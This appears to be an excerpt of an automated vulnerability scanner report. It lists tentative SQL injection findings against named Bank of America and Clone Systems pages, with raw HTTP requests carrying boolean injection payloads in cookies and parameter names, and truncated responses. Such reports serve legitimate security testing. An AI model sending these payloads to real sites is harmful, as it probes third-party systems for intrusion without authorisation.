User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US'%20and%201%3d2--%20; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:45 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00006SxuGb4zOEFxDtKnEhXqurr:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=443541; Expires=Sun, 23 Oct 2011 12:44:45 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="
...[SNIP]...

1.29. https://www.bankofamerica.com/Control.do [TLTSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The TLTSID cookie appears to be vulnerable to SQL injection attacks. The payloads 13270887'%20or%201%3d1--%20 and 13270887'%20or%201%3d2--%20 were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98013270887'%20or%201%3d1--%20; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:49 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=614; Expires=Sun, 23 Oct 2011 12:24:49 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:24:49 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascri
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98013270887'%20or%201%3d2--%20; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:50 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=676387; Expires=Sun, 23 Oct 2011 12:24:49 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...

1.30. https://www.bankofamerica.com/Control.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 24460292'%20or%201%3d1--%20 and 24460292'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll&124460292'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:45:10 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000MpYwfcy7zThLYbGwnLi-IAJ:12rfue8je; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=303; Expires=Sun, 23 Oct 2011 12:45:09 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:45:09 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll&124460292'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:45:11 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000mYYREZRsbBb_NNikvmGxTA9:12rfueih8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=489039; Expires=Sun, 23 Oct 2011 12:45:10 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="
...[SNIP]...

1.31. https://www.bankofamerica.com/ProcessUser.do [TLTSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /ProcessUser.do

Issue detail

The TLTSID cookie appears to be vulnerable to SQL injection attacks. The payloads 20087571'%20or%201%3d1--%20 and 20087571'%20or%201%3d2--%20 were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98020087571'%20or%201%3d1--%20; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:00 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000QigP94vPIqNsp2NsEkVjfBu:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=795; Expires=Sun, 23 Oct 2011 12:44:00 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:44:00 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Tue, 03 May 2011 12:44:00 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="
...[SNIP]...

Request 2

GET /ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98020087571'%20or%201%3d2--%20; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:02 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00002IQdPdK7ZBchgsxaS14rwpi:12rfuebu8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=288187; Expires=Sun, 23 Oct 2011 12:44:01 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Tue, 03 May 2011 12:44:01 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></scr
...[SNIP]...

1.32. http://www.clone-systems.com/ecommerce/cart.php [CMSSESSIDe4d04fcf cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The CMSSESSIDe4d04fcf cookie appears to be vulnerable to SQL injection attacks. The payloads 34446388'%20or%201%3d1--%20 and 34446388'%20or%201%3d2--%20 were each submitted in the CMSSESSIDe4d04fcf cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj6334446388'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:02:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/">Click here to keep shopping in PCI ASV Scanning Services</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                
...[SNIP]...

Request 2

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
